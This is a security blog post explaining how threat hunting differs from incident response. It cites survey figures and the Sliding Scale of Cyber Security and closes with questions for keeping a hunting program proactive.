Threat Hunting vs Incident Response: Getting Proactive Instead of Staying Reactive

Over the past few years, threat hunting has grown in popularity from an isolated practice to mainstream industry acceptance. Despite the rise in conference talks, vendor pitches selling threat hunting products and services, and excellent open source tools, there are still a lot of organizations that haven’t reaped the rewards of threat hunting. SANS Institute released their 2018 Threat Hunting Survey Results last month where they found that 43.2% organizations continuously hunt, 16.7% hunt on a regular schedule, 37.3% of organizations hunt based on some event trigger and 2.8% of organizations weren’t sure or didn’t know the answer [1]. While 59.9% of the 600 surveyed organizations reported an active threat hunting program, many organizations I encounter in the field still ask a lot of fundamental questions about what threat hunting is and why the investment in threat hunting is worth it.

Today we will explore the difference between threat hunting and your (hopefully existing) incident response plan. We will also look at how active threat hunting complements incident response.

Threat Hunting Defined

According to the SANS Institute definition, threat hunting is “a focused and iterative approach to searching out, identifying, and understanding adversaries who have entered the defender’s network [1].” This definition sounds good, but how does it add value to your existing program? When I started at the Air Force Computer Emergency Response Team (AFCERT), one of the things we learned in training was that defensive actions break into the following three categories.

First, you can invest in prevention. Technologies like antivirus, next-generation firewalls, and all the shiny boxes and promises vendors can help prevent an attack from happening in the first place. Even with a nearly unlimited budget, your prevention efforts will eventually fail. When prevention fails, you then move into detection. Detection refers to efforts and technologies for uncovering attackers in your network. Discovery is a cat and mouse game with attackers. After attacker discovery, response relates to the efforts involved in containing and removing the attacker from your environment. A comprehensive threat hunting program supports both prevention and detection while incident response mainly deals with the reaction.

Threat Hunting for Detection and Prevention

To dig deeper into gaining the full benefits of threat hunting, let’s look at The Sliding Scale of Cyber Security [2].

Incident response falls into the active response category. An organization might enter into an incident response scenario as the result of an intelligence category related source reporting an intrusion or a passive detection product generating an alert. Incident response occurs after the discovery an intrusion. An incident response scenario might lead an organization to invest additional resources in one of the five sliding scale categories, however, this investment will come after an intrusion.

Threat hunting also falls into the active response category. However, effective threat hunting informs an organization’s need for additional security before an event occurs. As an example, threat intelligence might drive an organization to proactively look for an attacker’s tactics, techniques, and procedures. If an organization discovers and implements an architectural gap or passive defense gap before an attacker using a tool reported on by a threat intelligence source, the threat hunt can be said to be passive. Likewise, if an organization discovers a previously undetected attacker due to the knowledge of a new attacker tactic, threat hunting would be classified as a detection source.

Parting Thoughts

A well-designed threat hunting program assists with knowing where resources can be allocated to help keep attackers out or detect an attacker when they get in. In comparison, incident response deals with an organization’s response to triage and respond to a security event in the environment.

To keep your threat hunting proactive, you should look for the following things:

Do your threat hunts drive architecture changes when a hunt uncovers a structural weakness in your architecture?
Are your threat hunts proactive or reactive?
Do your threat hunts look for things beyond what your existing passive defense measures might see?
When incidents do happen, do you expand the scope of your threat hunts to try to prevent the attack in the future or find the incident sooner?

Stay tuned next week as we further dive into how to ensure your threat hunt program both prevents and detects attackers.